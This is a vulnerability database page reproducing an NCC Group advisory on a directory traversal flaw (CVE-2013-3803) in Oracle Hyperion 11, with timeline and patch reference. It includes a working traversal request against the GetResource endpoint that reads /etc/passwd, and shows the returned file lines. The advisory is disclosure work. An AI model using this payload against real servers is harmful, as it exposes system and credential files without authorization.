Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:29705
HistoryAug 12, 2013 - 12:00 a.m.

NGS00434 Technical Advisory: Oracle Hyperion 11 Directory Traversal

2013-08-1200:00:00
vulners.com
26
JSON

=======
Summary

Name: Oracle Hyperion 11 - Directory Traversal
Release Date: 30 July 2013
Reference: NGS00434
Discoverer: Richard Warren <[email protected]>
Vendor: Oracle
Vendor Reference: S0318807
Systems Affected: Oracle Hyperion 11.1.1.3, 11.1.1.4.107 and earlier, 11.1.2.1.129 and earlier, and 11.1.2.2.305 and earlier
Risk: High
Status: Published

========
TimeLine

Discovered: 20 November 2012
Released: 20 November 2012
Approved: 20 November 2012
Reported: 20 November 2012
Fixed: 16 July 2013
Published: 30 July 2013

===========
Description

Product: Oracle
Application: Hyperion
Version: 11.x

Vulnerability

The application was found to be vulnerable to a directory traversal attack.
The following URL resulted in directory transversal.
http://localhost:19000/raframework/ihtml/GetResource?DocUUID=00000122ad09cf47-0000-d521-0aeaf211&amp;DocInstanceID=1&amp;ResourceName=../../../../../../../../../../../../../../../../LFI_HERE

=================
Technical Details

Exploitation

The following request/response was observed:

GET
/raframework/ihtml/GetResource?DocUUID=00000122ad09cf47-0000-d521-0aeaf211&DocInstanceID=1&ResourceName=…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/etc/passwd
HTTP/1.0

HTTP/1.1 200 OK
Date: Mon, 12 Nov 2012 15:28:10 GMT
Server: Oracle-Application-Server-11g
Cache-Control: no-cache
Pragma: no-cache
Expires: Mon, 1 Jan 1990 00:00:00 GMT
Last-Modified: Mon, 12 Nov 2012 15:28:10 GMT
X-ORACLE-DMS-ECID: 004n^rmuJTjAtH^5lV5EiZ0004FS0058zX
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Content-Type: text/plain
Content-Language: en

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
–SNIP–

===============
Fix Information

Fixed in Oracle CPU July 2013:
http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html
Assigned CVE-2013-3803

NCC Group Research
http://www.nccgroup.com/research

For more information please visit <a href="http://www.mimecast.com">http://www.mimecast.com<br>
This email message has been delivered safely and archived online by Mimecast.
</a>

Related

prion 1
exploitpack 1
zdt 1
packetstorm 1
cve 1
exploitdb 1
oracle 1
securityvulns 1
prion
prion
Design/Logic Flaw
2013-07-17 13:41:00
exploitpack
exploitpack
Oracle Hyperion 11 - Directory Traversal
2013-08-02 00:00:00
zdt
zdt
Oracle Hyperion 11 - Directory Traversal
2013-08-03 00:00:00
packetstorm
packetstorm
Oracle Hyperion 11 Directory Traversal
2013-07-31 00:00:00
cve
cve
CVE-2013-3803
2013-07-17 13:41:00
exploitdb
exploitdb
Oracle Hyperion 11 - Directory Traversal
2013-08-02 00:00:00
oracle
oracle
Oracle Critical Patch Update - July 2013
2013-07-16 00:00:00
securityvulns
securityvulns
Oracle / Sun / MySQL / PeopleSoft applications multiple security vulnerabilities
2013-08-12 00:00:00
JSON
Related for SECURITYVULNS:DOC:29705
prion1exploitpack1zdt1packetstorm1cve1exploitdb1oracle1securityvulns1